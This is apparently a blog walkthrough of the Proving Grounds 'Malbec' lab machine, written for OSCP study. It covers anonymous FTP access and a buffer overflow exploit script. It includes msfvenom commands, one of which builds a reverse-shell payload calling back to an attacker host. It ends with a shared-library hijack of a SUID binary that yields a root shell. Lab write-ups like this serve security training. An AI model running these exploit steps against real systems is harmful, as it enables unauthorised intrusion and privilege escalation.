Proving grounds:Malbec

Al1z4deh:~# echo "Welcome"
5 min readDec 10, 2022

--

Today we will take a look at Proving grounds: Malbec. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
2121/tcp open ftp pyftpdlib 1.5.6
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 carlos carlos 108304 Jan 25 2021 malbec.exe [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.200.129:2121
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
7138/tcp open unknown
  • FTP
┌──(root㉿kali)-[~/ctf]
└─# ftp 192.168.200.129 2121
Connected to 192.168.200.129.
220 pyftpdlib 1.5.6 ready.
Name (192.168.200.129:root): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering extended passive mode (|||46511|).
150 File status okay. About to open data connection.
-rwxrwxrwx 1 carlos carlos 108304 Jan 25 2021 malbec.exe
226 Transfer complete.
ftp> mget malbec.exe
mget malbec.exe [anpqy?]? y
229 Entering extended passive mode (|||59881|).
150 File status okay. About to open data connection.
100% |************************************************************************************************************************************************| 105 KiB 363.41 KiB/s 00:00 ETA
226 Transfer complete.
108304 bytes received in 00:00 (363.28 KiB/s)
ftp> exit
221 Goodbye.

When running the .exe file, port 7138 is opened. This port was enabled on the target machine.

I transfer this file to my windows machine and test it.

And the result: buffer overflow. Here I want to share with you two resources that I use.

Pay attention to every detail.

┌──(root㉿kali)-[~/ctf]
└─# msf-pattern_create -l 888
┌──(root㉿kali)-[~/ctf]
└─# msf-pattern_offset -l 888 -q 6C41336C
[*] Exact match at offset 340

┌──(root㉿kali)-[~/ctf]
└─# cat buffer2.py
import socket

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(('192.168.79.137',7138))

data="A"*340 + "B"*4
s.send(data)

s.close()

┌──(root㉿kali)-[~/ctf]
└─# python2.7 buffer2.py
msfvenom -a x86 -p windows/exec CMD=calc.exe -f c -b ‘\x00’

I forgot to turn off the voice) Please consider turning down the volume, and I’m sorry for bothering you.🤝

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.200 LPORT=2121 -f c -b ‘\x00’ EXITFUNC=thread
  • Privilage
carlos@malbec:/home/carlos$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/messenger
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd

An interesting binary is /usr/bin/messenger.

carlos@malbec:/home/carlos$ /usr/bin/messenger
/usr/bin/messenger: error while loading shared libraries: libmalbec.so: cannot open shared object file: No such file or directory

Reports that the dynamic shared library libmalbec.so was not found.
We can check by running ldd.

carlos@malbec:/home/carlos$ ldd /usr/bin/messenger
linux-vdso.so.1 (0x00007ffc377f3000)
libmalbec.so => not found
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f5142676000)
/lib64/ld-linux-x86-64.so.2 (0x00007f514284c000)

The malbec.conf configuration file:

carlos@malbec:/home/carlos$ ls -l /etc/ld.so.conf.d/
ls -l /etc/ld.so.conf.d/
total 20
-rw-r--r-- 1 root root 38 Jun 25 2018 fakeroot-x86_64-linux-gnu.conf
-rw-r--r-- 1 root root 168 May 1 2019 i386-linux-gnu.conf
-rw-r--r-- 1 root root 44 Mar 20 2016 libc.conf
-rw-r--r-- 1 root root 14 Jan 26 04:43 malbec.conf
-rw-r--r-- 1 root root 100 May 1 2019 x86_64-linux-gnu.conf

carlos@malbec:/home/carlos$ cat /etc/ld.so.conf.d/malbec.conf
cat /etc/ld.so.conf.d/malbec.conf
/home/carlos/
carlos@malbec:/home/carlos$ strings /usr/bin/messenger
-------------------
__gmon_start__
malbec // The malbec string appears a couple of times in the output
__libc_start_main
libmalbec.so
...
_ITM_registerTMCloneTable
malbec // The malbec string appears a couple of times in the output

Create a payload

carlos@malbec:/home/carlos$ nano root.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
void malbec() {
setuid(0); setgid(0); system("/bin/bash");
}
carlos@malbec:/home/carlos$ gcc root.c -o libmalbec.so -shared -fPIC -w
gcc: error trying to exec ‘cc1’: execvp: No such file or directory

PATH variable has not been exported.
To fix this, we'll export this variable.


carlos@malbec:/home/carlos$ export
declare -x LS_COLORS=""
declare -x OLDPWD
declare -x PWD="/home/carlos"
declare -x SHLVL="1"
declare -x TERM="xterm"

carlos@malbec:/home/carlos$ export PATH

carlos@malbec:/home/carlos$ export
declare -x LS_COLORS=""
declare -x OLDPWD
declare -x PATH="/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:."
declare -x PWD="/home/carlos"
declare -x SHLVL="1"
declare -x TERM="xterm"

Compile

carlos@malbec:/home/carlos$ gcc root.c -o libmalbec.so -shared -fPIC -w

carlos@malbec:/home/carlos$ ldd /usr/bin/messenger
linux-vdso.so.1 (0x00007fff9d1b0000)
libmalbec.so => /home/carlos/libmalbec.so (0x00007f72ea20d000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f72ea04c000)
/lib64/ld-linux-x86-64.so.2 (0x00007f72ea227000)

Root

carlos@malbec:/home/carlos$ whoami
carlos
carlos@malbec:/home/carlos$ /usr/bin/messenger
root@malbec:/home/carlos# whoami
root

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--